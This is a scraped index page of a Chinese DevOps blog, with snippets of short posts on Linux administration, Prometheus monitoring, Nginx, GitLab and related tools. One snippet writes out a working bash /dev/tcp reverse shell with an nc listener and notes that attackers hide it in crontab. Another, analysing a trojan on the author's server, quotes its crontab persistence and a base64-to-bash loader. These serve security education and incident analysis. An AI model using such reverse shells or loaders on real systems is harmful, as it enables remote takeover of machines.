Max27149的博客

DevOps...
私信 关注
M.27149
码龄4年

时间变得更值钱

  • 170,883
    被访问量
  • 18
    原创文章
  • 50,111
    作者排名
  • 15
    粉丝数量
  • 于 2016-12-05 加入CSDN
获得成就
  • 获得19次点赞
  • 内容获得7次评论
  • 获得62次收藏
荣誉勋章
兴趣领域
  • #运维
    #自动化/DevOps#运维开发#Linux/CentOS#安全#Kubernetes/容器#Jenkins#系统架构
TA的专栏
  • 系统知识
    2篇
  • 眼界/趋势
    7篇
  • 命令/工具/利器
    40篇
  • 监控技术
    20篇
  • 填坑/救火
    8篇
  • 网络/协议
    9篇
  • 守护进程/服务
    9篇
  • Debian/Ubuntu
    9篇
  • Shell脚本
    7篇
  • 读书摘抄
  • WinSrv
    1篇
  • 架构知识
    5篇
  • CI/CD
    13篇
  • 安全技术
    5篇
  • 数据库
    3篇
  • Python
    4篇
  • 面试准备
    2篇
  • 编程通用
    1篇
  • 容器技术
    4篇
  • 运维自动化
    1篇
  • WEB
    2篇
  • 虚拟化
    2篇
  • 最近
  • 文章
  • 资源
  • 问答
  • 课程
  • 帖子
  • 收藏
  • 关注/订阅

已解决:在/var/spool/cron/root中执行shell脚本定时任务,ipvsadm-save -n > x.save保存的文件为空

root # crontab -l0 1 * * * sh /opt/lvs_conf_bak.sh &>/dev/nullroot # cat /opt/lvs_conf_bak.sh#!/bin/sh...ipvsadm-save -n > x.save...解决方案1:ipvsadm-save 使用全路径root # which ipvsadm-save/usr/sbin/ipvsadm-save解决方案2:脚本开头加载roo...
原创
329阅读
0评论
0点赞
发布博客于 5 月前

find 清空文件/删除文件

清空并不删除/usr/bin/find /home/docker/ -name ‘*-json.log’ -size +1G -exec cp /dev/null {} ;删除:/usr/bin/find /home/docker/ -name ‘*-json.log’ -size +1G -delete
转载
114阅读
0评论
0点赞
发布博客于 6 月前

HP服务器管理工具hpacucli

下载地址hpacucli使用hpacucli helphpacucli <target> <command> [parameter=value]查看slot槽位[root@log00 ~]# hpacucli ctrl all show Smart Array P400 in Slot 0 (Embedded) Smart Array P400 in Slot 8 (sn: AFL0TSXV1FD)查看RAIDhpacucli
原创
284阅读
0评论
0点赞
发布博客于 8 月前

XEN设置指定的虚拟机在宿主机开机时自动启动

执行命令xe vm-param-set uuid=xxxxxxxx other-config:auto_poweron=true设定所有的虚拟机自启:for i in `xe vm-list params=uuid --minimal|sed 's#,# #g'`;do xe vm-param-set uuid=$i other-config:auto_poweron=true; done...
转载
101阅读
0评论
0点赞
发布博客于 10 月前

Nginx域名高延迟,TCP Retransmission多

现象是访问Nginx上的域名,延迟高,抓包看到TCP Retransmission比较多参考自:https://blog.51cto.com/xiao987334176/1663462https://my.oschina.net/u/1169457/blog/1594969
转载
228阅读
0评论
0点赞
发布博客于 10 月前

Xenserver的VM卡死不能重启解决办法

http://www.youhuiba.net/2013/04/09/500.htmlhttps://www.jianshu.com/p/a5e10539926b
原创
289阅读
0评论
0点赞
发布博客于 2 年前

StatsD Metric

https://www.jianshu.com/p/2b0aa5898dd7
转载
301阅读
0评论
0点赞
发布博客于 2 年前

node_exporter网络相关采集项

https://www.cnblogs.com/qianyuliang/p/10542699.html
转载
368阅读
0评论
0点赞
发布博客于 2 年前

zookeeper日志各类日志

https://www.cnblogs.com/jxwch/p/6526271.html
转载
48阅读
0评论
0点赞
发布博客于 2 年前

在线扩展XFS文件系统——xfs_growfs

https://linux.cn/article-3997-1.html
转载
1227阅读
0评论
0点赞
发布博客于 2 年前

Supervisor使用、爬坑

https://zhuanlan.zhihu.com/p/29145108
转载
91阅读
0评论
0点赞
发布博客于 2 年前

prometheus配置告警的坑

https://www.imooc.com/article/289509
转载
276阅读
0评论
0点赞
发布博客于 2 年前

一个木马

CPU飚高,发现可疑进程kill -9 强杀,crond -l 检查发现异常,先清理定时任务0 * * * * ~/.systemd-login~/.systemd-login内容分析#!/bin/bashexec &>/dev/nullsleep 7{echo,ZXhlYyA................ZmkK}|{base64,-d}|bashbase64...
原创
551阅读
0评论
0点赞
发布博客于 2 年前

shell脚本调用企业微信api发送告警

alert.sh#!/bin/shcorpId=xxxxxxxxxxxcorpSecret=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###### get token### version 1# curl "https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=${corpId}&...
原创
385阅读
0评论
0点赞
发布博客于 2 年前

YAML 语言教程

http://www.ruanyifeng.com/blog/2016/07/yaml.html?f=t
转载
37阅读
0评论
0点赞
发布博客于 2 年前

生成随机密码的10种方法

https://www.cnblogs.com/xyz0601/p/4445711.html
转载
1518阅读
0评论
0点赞
发布博客于 2 年前

telnet免交互端口探测

https://www.jianshu.com/p/92adf516a62d免交互端口探测(echo '')|telnet 10.199.136.212 9000参数-e指定跳脱字符(echo 'q')|telnet -e 'q' 10.199.136.212 50070
转载
725阅读
0评论
0点赞
发布博客于 2 年前

nginx 实现301跳转的三种方法

return指令在301跳转上比rewrite指令性能上更加有优势。https://mp.weixin.qq.com/s/Bvf6SkDafzeW9Kh-_-RxDwhttps://www.jianshu.com/p/3fe4f45729e6
转载
5710阅读
0评论
0点赞
发布博客于 2 年前

blackbox_exporter检查HTTP报405

现象:405: curl -I test.com/sign-in200: curl -XGET -I test.com/sign-in参考:https://blog.csdn.net/CapMiachael/article/details/51781335http://blackbox_exporterIP:9115/config解决:修改blackbox.yml配置文件https...
转载
318阅读
3评论
0点赞
发布博客于 2 年前

redis_exporter监控不同IP不同密码Redis多实例

启动nohup ./redis_exporter -web.listen-address :9121 -redis.addr x.x.x.1:6377 -redis.password password2 &nohup ./redis_exporter -web.listen-address :9122 -redis.addr x.x.x.1:6378 -redis.password...
原创
2969阅读
0评论
0点赞
发布博客于 2 年前

logrotate

文章目录一、logrotate 配置参数 功能二、缺省配置 logrotate三、使用include 选项读取其他配置文件四、使用include 选项覆盖缺省配置五、为指定的文件配置转储参数六、其他需要注意的问题1. 尽管花括号的开头可以和其他文本放在同一行上,但是结尾的花括号必须单独成行。2. 使用 prerotate 和 postrotate 选项3、logrotate 的运行分为三步:4、/...
转载
122阅读
0评论
0点赞
发布博客于 2 年前

对编译安装的Nginx使用nginx_vts_exporter

对编译安装的Nginx使用nginx_vts_exporter在nginx编译时添加vts模块下载解压wget http://nginx.org/download/nginx-1.16.0.tar.gzwget https://github.com/vozlt/nginx-module-vts/archive/v0.1.18.tar.gzwget https://www.openssl....
原创
432阅读
0评论
0点赞
发布博客于 2 年前

inhibit_rules告警抑制失败总结

注意配置项名称要能对应上,单独给某个alertname指定抑制规则时,各个级别(warning、critical)的alertname要以保持一致才生效,比如 pingwarning (warning)和 pingerror(critical),alertname不一致,抑制不成功。大小写要一致。不能一会儿是critical,一会儿是CRITICAL...
原创
1564阅读
0评论
0点赞
发布博客于 2 年前

网络网络网络

ARP原理与免费ARPhttp://support.huawei.com/enterprise/docinforeader!loadDocument1.action?contentId=DOC0000645565&partNo=100102#cbb108819MSL、TTL、RTThttps://zhuanlan.zhihu.com/p/53302460URLhttps://bl...
转载
30阅读
0评论
0点赞
发布博客于 2 年前

ping命令显示时间戳

https://blog.csdn.net/lxypeter521/article/details/80942888ping 后面加上 | awk ‘{ print $0"\t" strftime("%H:%M:%S",systime()) }’[root@test~]# ping -i 5 -c 4 192.168.60.2 | awk '{ print $0"\t" strftime("...
转载
1432阅读
0评论
0点赞
发布博客于 2 年前

ShellShellShell

24道shell脚本面试题https://mp.weixin.qq.com/s/z8gG2ILYRS0I3n793vy3pw备用:http://os.51cto.com/art/201902/592119.htmshell >&2的含义及用法https://blog.csdn.net/huangjuegeek/article/details/2171380...
转载
83阅读
0评论
0点赞
发布博客于 2 年前

ZABBIX对接企业微信报警

ZABBIX对接企业微信报警 https://www.cnblogs.com/zhaobin-diray/p/11046155.html
转载
306阅读
0评论
0点赞
发布博客于 2 年前

AnsibleAnsibleAnsible

https://www.cnblogs.com/happy-king/p/9006771.htmlhttps://www.cnblogs.com/happy-king/p/8984535.html
转载
32阅读
0评论
0点赞
发布博客于 2 年前

grafana发邮件配置

grafana发邮件配置# grep ^[^#\;] /etc/grafana/grafana.ini[paths][server]domain = xxxroot_url = http://xxx:3000[database]log_queries =[remote_cache][dataproxy][analytics][security][snapshots][da...
原创
383阅读
1评论
0点赞
发布博客于 2 年前

mongodb mms服务

http://www.ttlsa.com/mms/follow-me-to-use-mongodb-mms-services/
转载
73阅读
0评论
0点赞
发布博客于 2 年前

PrometheusPrometheusPrometheus

https://www.jianshu.com/p/715a614ef5e4
转载
63阅读
0评论
0点赞
发布博客于 2 年前

alertmanager-0.18.0 调用企业微信api推送告警

https://work.weixin.qq.com/api/devtools/devtool.php
原创
1629阅读
0评论
0点赞
发布博客于 2 年前

Python读写txt文本文件的操作方法全解析

https://www.jb51.net/article/87398.htm
转载
88阅读
0评论
0点赞
发布博客于 2 年前

虚拟机安装zabbix-server-mysql报错:libiksemel.so.3()(64bit)

https://blog.csdn.net/jiaping0424/article/details/94661482Error: Package: zabbix-server-mysql-3.4.15-1.el7.x86_64 (zabbix) Requires: libiksemel.so.3()(64bit)一步解决:yum install -y http://spr...
转载
2003阅读
0评论
0点赞
发布博客于 2 年前

Centos7 自定义systemctl服务脚本

https://www.cnblogs.com/wang-yc/p/8876155.html
转载
626阅读
0评论
0点赞
发布博客于 2 年前

prometheus监控web页面——blackbox_exporter

https://yq.aliyun.com/articles/502585
转载
3069阅读
0评论
0点赞
发布博客于 2 年前

监控系统度量Metrics的分类

https://www.jianshu.com/p/5d3ea3be3122
转载
160阅读
0评论
0点赞
发布博客于 2 年前

蓝绿、滚动、金丝雀发布

https://zhuanlan.zhihu.com/p/42671353蓝绿部署不停掉老版本,而是直接部署一套新版本,等新版本运行起来后,再将流量切换到新版本上。无停机时间但对硬件的要求就是日常所需的二倍滚动发布能够解决掉蓝绿部署时对硬件要求增倍的问题。先启动一台新版本,再停止一台老版本,然后再启动一台新版本,再停止一台老版本,直到升级完成,对硬件的要求是N+1隐患:未做流量控制...
转载
171阅读
0评论
0点赞
发布博客于 2 年前

fstab文件分析

/etc/fstab文件内容格式分析https://blog.csdn.net/gdut243/article/details/6286058fstab文件格式不重启检查http://ju.outofmemory.cn/entry/185802# mount -fav-a, --all 挂载 fstab 中的所有文件系统-f, --fake ...
转载
84阅读
0评论
0点赞
发布博客于 2 年前

Jenkins 自动化部署上线

https://i4t.com/3174.html
转载
62阅读
0评论
0点赞
发布博客于 2 年前

python3学习

http://www.ttlsa.com/docs/dive-into-python3/
转载
36阅读
0评论
0点赞
发布博客于 2 年前

服务器断电重启与正常重启的区别——/var/log/secure

区别在于一个关键句: Registered Authentication Agent for unix-process断电重启日志:14:00Jul 20 13:23:58 localhost sshd[1582]: pam_unix(sshd:session): session closed for user rootJul 20 13:23:59 localhost sshd[154...
原创
1989阅读
0评论
0点赞
发布博客于 2 年前

分布式文件系统-FastDFS

https://blog.51cto.com/xinzong/1834466
转载
59阅读
0评论
0点赞
发布博客于 2 年前

详解十三款运维监控工具

http://os.51cto.com/art/201906/597543.htm
转载
398阅读
0评论
0点赞
发布博客于 2 年前

5个最佳免费Linux杀毒软件

https://www.linuxidc.com/Linux/2016-08/134610.htm
转载
9280阅读
0评论
0点赞
发布博客于 2 年前

IaaS,PaaS,SaaS 的区别

http://www.ruanyifeng.com/blog/2017/07/iaas-paas-saas.html
转载
49阅读
0评论
0点赞
发布博客于 2 年前

Kubernetes与云原生应用概览——Jimmy Song

https://zhuanlan.zhihu.com/p/30063678
转载
269阅读
0评论
0点赞
发布博客于 2 年前

MySQL知识汇总

老司机也必须掌握的MySQL优化指南https://mp.weixin.qq.com/s/-PTyXekEvWpO9x2LPTIgSgMySQL性能诊断实践之系统观测工具https://mp.weixin.qq.com/s/-xUNzLVrXKbhp1NudkTebw
原创
72阅读
0评论
0点赞
发布博客于 2 年前

Kafka基本原理

各消息队列对比,Kafka深度解析https://blog.csdn.net/allthesametome/article/details/47362451Apache Kafka:下一代分布式消息系统https://blog.csdn.net/xlgen157387/article/details/77211729Kafka单机环境配置及基本使用详解https://www.linuxi...
转载
70阅读
0评论
0点赞
发布博客于 2 年前

Dubbo架构设计详解

http://shiyanjun.cn/archives/325.html
转载
54阅读
0评论
0点赞
发布博客于 2 年前

分布式理论

分布式服务框架设计https://www.cnblogs.com/stateis0/p/9062138.html分布式理论(一) —— CAP 定理https://www.cnblogs.com/stateis0/p/9062121.html分布式理论(二)——Base 理论https://www.cnblogs.com/stateis0/p/9062123.html分布式理论(六)—...
转载
45阅读
0评论
0点赞
发布博客于 2 年前

浅谈集群、分布式、微服务的异同

https://mp.weixin.qq.com/s/KMuW00As_4hWgr1mS4T28whttp://os.51cto.com/art/201905/596947.htm
转载
85阅读
0评论
0点赞
发布博客于 2 年前

简单了解Docker和K8S

https://mp.weixin.qq.com/s?__biz=MjM5NTU2MTQwNA==&mid=2650658351&idx=1&sn=520e159c000ab5cdac027feb5419621c&chksm=beffdcfc898855ea516c2aa1dd20175169c06963267319c2770d8372c5d98e3732b6f4b...
转载
178阅读
0评论
0点赞
发布博客于 2 年前

知乎:有什么是你面试很多次都失败后才知道的?

https://www.zhihu.com/question/290543744
转载
1415阅读
0评论
0点赞
发布博客于 2 年前

2019运维技能风向标

http://dockone.io/article/8859
转载
167阅读
0评论
0点赞
发布博客于 2 年前

Docker入门篇

这可能是把Docker概念讲的最清楚的一篇文章http://cloud.51cto.com/art/201807/577775.htmhttps://mp.weixin.qq.com/s?__biz=MjM5ODI5Njc2MA==&mid=2655819858&idx=1&sn=ec04484336b117b4d37f1c9069baee4d&chksm=bd...
转载
126阅读
0评论
0点赞
发布博客于 2 年前

Kubernetes入门篇

https://mp.weixin.qq.com/s?__biz=MjM5ODI5Njc2MA==&mid=2655821691&idx=1&sn=1049b76f5256e09c251aaf2261738293&chksm=bd74d2ac8a035bbaaee9f07aa10a36c4f6792ee6fb9f8673b2cb394cbc6db1b736e06b8...
转载
87阅读
0评论
0点赞
发布博客于 2 年前

NginxNginxNginx

https://blog.csdn.net/xlgen157387/article/category/5928485
原创
98阅读
0评论
0点赞
发布博客于 2 年前

灵活的系统和应用采集软件——tsar

https://yq.aliyun.com/articles/608798
转载
104阅读
0评论
0点赞
发布博客于 2 年前

初级、中级、高级运维各应必备哪些技能?

http://os.51cto.com/art/201904/594889.htm
转载
651阅读
0评论
0点赞
发布博客于 2 年前

Redis数据库

http://news.51cto.com/art/201905/596428.htm
转载
173阅读
0评论
0点赞
发布博客于 2 年前

HTTP中GET与POST的区别

http://os.51cto.com/art/201905/596465.htm
转载
78阅读
0评论
0点赞
发布博客于 2 年前

29个监控工具

http://os.51cto.com/art/201905/596431.htm
转载
105阅读
0评论
0点赞
发布博客于 2 年前

面试 Linux 运维

https://mp.weixin.qq.com/s/wbhNYKaqzkEay_LQDIn0Tg
转载
168阅读
0评论
0点赞
发布博客于 2 年前

系统运维中网络方面的方法论

http://os.51cto.com/art/201904/595121.htm
转载
156阅读
0评论
0点赞
发布博客于 2 年前

网络测试示例——iperf3 qperf

Centos 7客户端、服务端安装iperf3 qperfyum install -y iperf3 qperf带宽测试TCPUDP丢包、网络抖动测试延时测试
原创
986阅读
0评论
0点赞
发布博客于 2 年前

history命令如何记录历史执行时间

https://www.linuxidc.com/Linux/2012-08/67137.htm编辑 /etc/bashrc 或者 /etc/bash.bashrc增加两个全局变量声明:HISTTIMEFORMAT="%F %T `whoami` ### "export HISTTIMEFORMATHISTSIZE=9999export HISTSIZE退出会话,重新登录,修改结...
转载
443阅读
0评论
0点赞
发布博客于 2 年前

填沟壑:文件已删除但未释放磁盘空间

[root@test01 ~]# yum install -y lsof[root@test01 ~]# ping www.qq.com > test.txt &[1] 3891[root@test01 ~]# rm test.txt -f[root@test01 ~]# lsof |grep deletedping 3891 root 1w REG 253,0...
转载
60阅读
0评论
0点赞
发布博客于 2 年前

区分物理机与虚拟机

如何在脚本中区分物理机与虚拟机?虚拟机[root@test ~]# dmidecode -s system-product-nameVMware Virtual Platform[root@test ~]# systemd-detect-virtvmware[root@test ~]# hostnamectl statusChassis: vmVirtualization:...
原创
481阅读
0评论
0点赞
发布博客于 2 年前

安全:nc实现反弹shell示例

控制主机 192.168.60.111 用nc监听666端口nc -l 666被控主机 192.168.60.222 执行反弹shellbash -i >& /dev/tcp/192.168.60.111/666 0>&1;远程控制PS:黑客较为隐蔽的方式是将反弹shell写入crontab...
原创
453阅读
0评论
0点赞
发布博客于 2 年前

填沟壑:ssh登录慢

关闭gssapi认证可以解决vim /etc/ssh/sshd_configUseDNS noGSSAPIAuthentication no
转载
31阅读
0评论
0点赞
发布博客于 2 年前

动态增加swap分区方法

# mkdir /opt/images/# dd if=/dev/zero of=/opt/images/swap bs=1M count=2048# mkswap /opt/images/swap# swapon /opt/images/swap当使用完毕后,可以将其释放掉,也可以留着以后用。释放命令如下:# swapoff /opt/images/swap如果想关闭整个sw...
转载
353阅读
0评论
0点赞
发布博客于 2 年前

新磁盘分区、格式化、挂载

分区[root@test ~]# fdisk /dev/sdbnpw格式化[root@test ~]# mkfs.ext4 /dev/sdb1挂载[root@test ~]# mount /dev/sdb1 /opt/[root@test ~]# df -h开机挂载查看uuid[root@test ~]# blkid /dev/sdb1或者[root@t...
转载
64阅读
0评论
0点赞
发布博客于 2 年前

Git:gitlab修改域名配置

sudo gitlab-ctl stop修改/etc/gitlab/gitlab.rb中的如下一行:external_url ‘http://gitlab.xxxxx.cn’执行更新配置操作sudo gitlab-ctl reconfiguresudo gitlab-ctl start
转载
4750阅读
0评论
0点赞
发布博客于 2 年前

shell:脚本中标准时间与Unix时间戳之间的转换

Unix时间戳(英文为Unix epoch, Unix time, POSIX time 或 Unix timestamp)是从1970年1月1日(UTC/GMT的午夜)开始所经过的秒数,不考虑闰秒。UNIX时间戳的0按照ISO 8601规范为 :1970-01-01T00:00:00Z.一个小时表示为UNIX时间戳格式为:3600秒;一天表示为UNIX时间戳为86400秒,闰秒不计算。标...
转载
1164阅读
0评论
0点赞
发布博客于 2 年前

*.gz格式解压命令 gzip gunzip

压缩gzip xxx.log不保留原压缩文件,解压gzip -d xxx.log.gz == gunzip xxx.log.gz保留压缩原文件,解压gzip -dc xxx.log.gz > xxx.log == gunzip -c xxx.gz > xxx.log查看压缩包中的内容列表gzip -l xxx.log.gz == gunzip -l xxx.log.gz...
转载
3110阅读
0评论
0点赞
发布博客于 2 年前

Python十分钟入门

http://roclinux.cn/?p=2338
转载
36阅读
0评论
0点赞
发布博客于 2 年前

Python:100+编程题(附答案)

https://blog.csdn.net/dQCFKyQDXYm3F8rB0/article/details/86610486
转载
2357阅读
0评论
0点赞
发布博客于 2 年前

新一代的rpm软件包管理器——dnf

http://man.linuxde.net/dnf
转载
300阅读
0评论
1点赞
发布博客于 2 年前

杂学:token认证

https://blog.csdn.net/daimengs/article/details/81088172
转载
41阅读
0评论
0点赞
发布博客于 2 年前

利器:网速测试——speedtest

直接安装:# pip install speedtest-cli# 安装完直接执行# speedtest或者参考:http://www.cnblogs.com/KevinJasmine/p/6700312.html中的方法:# wget https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py...
转载
895阅读
0评论
0点赞
发布博客于 2 年前

Git:git免密操作

vim ~/.gitconfig[user] email = you@example.com name = Your Name[credential] helper = storehttps://blog.csdn.net/yaakire/article/details/78932442https://blog.csdn.net/duanm...
转载
78阅读
0评论
0点赞
发布博客于 2 年前

安全:SELinux知识

https://blog.csdn.net/qq_33750826/article/details/80743035
转载
59阅读
0评论
0点赞
发布博客于 2 年前

杂货:Linux 系统启动过程

http://www.runoob.com/linux/linux-system-boot.html
转载
54阅读
0评论
0点赞
发布博客于 2 年前

服务:LVS DR模式详细搭建过程

参考资料https://blog.csdn.net/shudaqi2010/article/details/51501837#t5http://www.cnblogs.com/dashuaige/p/6755141.html
转载
83阅读
0评论
0点赞
发布博客于 2 年前

利器:程序保活工具——runit

官方:http://smarden.org/runit/runsvdir.8.html中文参考:https://blog.csdn.net/weixin_34250709/article/details/87301431
转载
214阅读
0评论
0点赞
发布博客于 2 年前

Ubuntu:修改系统默认编码

https://blog.csdn.net/example440982/article/details/71218685CentOS:解决方案,修改如下:vi /etc/sysconfig/i18n添加下面的export LC_ALL=C再执行下面的语句,使之生效source /etc/sysconfig/i18n...
转载
1179阅读
0评论
0点赞
发布博客于 2 年前

Debian:Update-rc.d 详解

https://blog.csdn.net/shb_derek1/article/details/8489112
转载
407阅读
0评论
0点赞
发布博客于 2 年前

利器:邮件收发——mailx

https://blog.csdn.net/liang19890820/article/details/53115334?utm_source=blogxgwz8
转载
204阅读
0评论
1点赞
发布博客于 2 年前

监控:Debian 7 安装zabbix-agent

wget https://repo.zabbix.com/zabbix/3.0/debian/pool/main/z/zabbix-release/zabbix-release_3.0-2+wheezy_all.debapt -y install zabbix-agent
转载
132阅读
0评论
2点赞
发布博客于 2 年前

杂货:centos7/rhel7安装较高版本ruby2.2/2.3/2.4

https://blog.csdn.net/gaozongzonggao/article/details/80793864
转载
139阅读
0评论
1点赞
发布博客于 2 年前

Debian:apt和yum的使用方法对比

https://blog.csdn.net/mbxc816/article/details/7473906apt-cache命令功能:搜索某个软件包的名字或显示某个软件包的详细信息功能示例搜索mysql的软件包$ apt-cache search mysql查看ssh软件包的详细版本号$ apt-cache show ssh...
转载
1923阅读
0评论
0点赞
发布博客于 2 年前

杂货:Ruby程序包管理器——gem

转自:https://blog.csdn.net/dazhi_100/article/details/41987577简介RubyGems是一个方便而强大的Ruby程序包管理器( package manager),类似RedHat的RPM.它将一个Ruby应用程序打包到一个gem里,作为一个安装单元。无需安装,最新的Ruby版本已经包含RubyGems了。特点能远程安装包包之间依赖关系的...
转载
96阅读
0评论
0点赞
发布博客于 2 年前

解决TortoiseGit的pull操作将Unix换行符自动转成dos换行符——$'\r': command not found

https://blog.csdn.net/razorluo/article/details/42551691
转载
894阅读
0评论
0点赞
发布博客于 2 年前

安全:查看登陆系统用户的信息的三种方法详解——who、w、last

http://www.cnblogs.com/yinzhengjie/p/6257526.html
转载
771阅读
0评论
0点赞
发布博客于 3 年前

服务:Linux NTP配置详解 (Network Time Protocol)

https://blog.csdn.net/iloli/article/details/6431757
转载
173阅读
0评论
0点赞
发布博客于 3 年前

Ansible常见模块详解.pdf

@author 刘振伟 @QQ 570962906 Ansible拥有大量的模块(module library)来操作远程主机节点或者通过playbook对节点操作。
pdf
发布资源于 3 年前

GIT:gitlab汉化(注意版本)

http://blog.51cto.com/xiaozhagn/2122026http://www.cnblogs.com/cheng95/p/8037865.html
转载
477阅读
0评论
1点赞
发布博客于 3 年前

GIT:gitlab IP白名单

编辑/etc/gitlab/gitlab.rb文件gitlab_rails['rack_attack_git_basic_auth'] = { 'enabled' =&amp;gt; true, 'ip_whitelist' =&amp;gt; [&quot;127.0.0.1&quot;,&quot;1.2.3.4&quot;], 'maxretry' =&amp;gt; 300, 'findtime' =&amp;
转载
3529阅读
0评论
1点赞
发布博客于 3 年前

GIT:gitlab日志系统

文章目录控制台实时查看log查看所有的logs; 按 Ctrl-C 退出拉取/var/log/gitlab下子目录的日志拉取某个指定的日志文件gitlab的日志分类控制台实时查看loghttps://hai0378.iteye.com/blog/2366869查看所有的logs; 按 Ctrl-C 退出sudo gitlab-ctl tail拉取/var/log/gitlab下子目录的日...
转载
10676阅读
0评论
1点赞
发布博客于 3 年前